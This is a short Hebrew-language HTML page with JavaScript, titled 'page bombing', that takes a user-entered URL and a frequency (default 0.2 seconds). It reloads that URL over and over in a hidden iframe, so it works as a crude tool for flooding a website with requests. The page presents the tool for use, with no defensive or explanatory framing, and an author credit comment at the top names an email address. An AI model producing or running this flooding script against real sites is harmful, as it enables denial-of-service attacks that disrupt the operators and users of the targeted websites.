<!—this code was written by shoshan cohen, the one and only psclil@gmail.com -->
<html dir="rtl">
<head>
<title>הפצצת דף</title>
<script type="text/javascript">
var s = ""
var freq = 200;
function bomb_loc(){
var f = document.frm1.freq.value;
if (parseFloat(f)>0){
freq = parseFloat(f)*1000;
s = document.frm1.loc.value;
if (s.length>0){
document.all.ifrmUnseen.src = s;
x();
}else{
alert("הכנס כתובת");
document.frm1.loc.focus();
}
}else{
alert("הכנס מספר");
document.frm1.freq.select();
}
} function x(){
document.all.ifrmUnseen.src = s;
setTimeout("x()",freq);
}
</script>
<style type="text/css">
body{
background-color:#ffffff;
}
body,td,th{
font-family:Arial;
font-size:8pt;
color:#000000;
font-weight:normal;
}
</style>
</head>
<body>
<form name="frm1" onsubmit="return false;">
<table>
<tr>
<th>כתובת</th>
<td><input type="text" size="50" name="loc"/></td>
</tr>
<tr>
<th>תדירות (שניות)</th>
<td><input type="text" size="10" name="freq" value="0.2"/></td>
</tr>
<tr><th colspan="2"><input type="submit" onclick="bomb_loc();" value=" התחל " /></th></tr>
</table>
</form>
<iframe style="display:none;" id="ifrmUnseen"></iframe>
</body>
</html>
|